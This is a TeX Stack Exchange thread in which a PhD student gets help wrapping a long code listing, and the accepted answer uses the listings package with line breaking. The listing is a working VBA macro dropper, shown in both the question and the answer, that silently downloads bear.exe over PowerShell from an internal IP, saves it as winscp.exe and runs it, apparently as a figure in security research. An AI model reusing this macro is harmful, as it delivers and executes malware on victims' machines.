# How do I keep my code example from going off the page

Tags: verbatim

I am trying to add a code example with the ability to caption it at the end but it keeps going off the page to the right (see image).

[image: Example Image]

I have tried different verbatim and verbox and floats after hours of googling and testing, I think I have come to the conclusion I must be googling the wrong thing and gone off piste.

```
\documentclass[11pt, oneside, a4paper]{memoir}

% Packages for use in the thesis
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{lmodern}
\usepackage{multicol}
\usepackage[a4paper,width=138mm,top=35mm,bottom=35mm,bindingoffset=10mm]{geometry}
\usepackage{url}
\usepackage{titlesec}
\usepackage{graphicx}
\usepackage{hyperref}
\usepackage{rotating}
% \usepackage{gensymb}
\usepackage{pdflscape}
\usepackage{mathrsfs,amsmath}
\usepackage{units}
\usepackage{siunitx}
\usepackage{acronym}
\usepackage{booktabs}
\usepackage[UKenglish]{babel}
\usepackage{bibentry}
\usepackage{subcaption}
\usepackage{natbib}
\usepackage{float}
\usepackage{longtable}
\usepackage{lscape}
\usepackage{verbatimbox,caption,lipsum}
\usepackage{multirow}
\usepackage{xurl}
\chapterstyle{madsen}
\pagestyle{myruled}


\title{test}
\author{hi}

\begin{document}
\newfloat{Code}
\captionsetup{Code}
\begin{verbbox}
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)

Public Function download() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objW_M_I_INST = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Dim CC As String
        
        Set Sta_rt_up = objW_M_I_INST.Get("Win32_ProcessStartup")
        Set objCfg = Sta_rt_up.SpawnInstance_
        objCfg.ShowWindow = HIDDEN_WINDOW
        Set obj_Proc = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        \textbf{obj_Proc.Create "c:\windows\system32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c ""powershell -nop -c iwr -useb 10.10.10.1/bear.exe -outfile C:\windows\tasks\winscp.exe""", Null, objConfig, intProcessID}
End Function
     
Public Function execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objW_M_I_INST = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Dim CC As String
        
        Set Sta_rt_up = objW_M_I_INST.Get("Win32_ProcessStartup")
        Set objCfg = Sta_rt_up.SpawnInstance_
        objCfg.ShowWindow = HIDDEN_WINDOW
        Set obj_Proc = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        obj_Proc.Create "C:\windows\tasks\winscp.exe", Null, objConfig, intProcessID
     End Function
     
Sub a()
    download
    Sleep 10000
    execute

End Sub
\end{verbbox}
{\centering
\fbox{\theverbbox}
\captionof{Code}{Malicious Visual Basic Macro - bear.exe Dropper}\par
}


\bibliographystyle{alpha}
\bibliography{sample}

\end{document}
```

Comment: Welcome to TeX.SE! Please show us a short compilable TeX code resulting in your issue! Then we do not have to guess what you are doing ...

Comment: you have specified a verbatim environment so get no line breaking but you have not shown what fonts you are using or how wide your page is (or the definition of verbox)  but you have to decide what to do, you can use a wider page, or smaller fonts, or allow linebreaking (but then the displayed code may not be legal if the programming language does not allow newlines at arbitrary places such as inside a string) or you can edit the source before typesetting it not to have such long lines. you have to choose, latex can't make those design decisions for you.

Comment: @Mensch and David Carlisle thank you for getting back to me so quickly. I am very new to LaTeX, so I belive I have everything that you need that replicate what packages are in the template I need to follow.

Comment: @Wakey344 Would you like to add line breaks or a smaller font or bigger page?

Comment: HI @samcarter_is_at_topanswers.xyz Line breaks or small font would work, I do not think I am allowed to change the page margins,  This is for my PhD and There are requirements (I think) I need to stick to when usin their template.  Thanks for the help.

Answer (score 0, accepted):

You use the `listings` package to add your code. With the `breaklines` option you could allow automatic line breaking.

Besides this, the package has tons of other options to customise the appearance of the code, here a short example which should give something similar to the image you showed:

```
\documentclass[11pt, oneside, a4paper]{memoir}

\usepackage[a4paper,width=138mm,top=35mm,bottom=35mm,bindingoffset=10mm]{geometry}
\usepackage{float}
\usepackage{caption}
\usepackage{listings}
\renewcommand{\lstlistingname}{Code}

\lstset{
  breaklines=true,
  basicstyle=\ttfamily\scriptsize,
  frame=single,
  captionpos=b,
}

\begin{document}

\begin{lstlisting}[
  caption={Malicious Visual Basic Macro - bear.exe Dropper},
  ]
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)

Public Function download() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objW_M_I_INST = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Dim CC As String
        
        Set Sta_rt_up = objW_M_I_INST.Get("Win32_ProcessStartup")
        Set objCfg = Sta_rt_up.SpawnInstance_
        objCfg.ShowWindow = HIDDEN_WINDOW
        Set obj_Proc = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        \textbf{obj_Proc.Create "c:\windows\system32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c ""powershell -nop -c iwr -useb 10.10.10.1/bear.exe -outfile C:\windows\tasks\winscp.exe""", Null, objConfig, intProcessID}
End Function
     
Public Function execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objW_M_I_INST = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Dim CC As String
        
        Set Sta_rt_up = objW_M_I_INST.Get("Win32_ProcessStartup")
        Set objCfg = Sta_rt_up.SpawnInstance_
        objCfg.ShowWindow = HIDDEN_WINDOW
        Set obj_Proc = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        obj_Proc.Create "C:\windows\tasks\winscp.exe", Null, objConfig, intProcessID
     End Function
     
Sub a()
    download
    Sleep 10000
    execute

End Sub
\end{lstlisting}

\end{document}
```

[image]

Comment: Brilliant this solved my problem!!  Thank you!

Comment: @Wakey344 I would add `\usepackage{listings}\renewcommand{\lstlistingname}{Code}\lstset{...}` to where you load your other packages. This way you will get a consistent appearance of all the listings in your document.

Comment: Thank you, I am trying to upvote your answer, but I do not meet the requirements to do so.  Thanks for your help!

Comment: @Wakey344 You're welcome! And please don't worry about voting!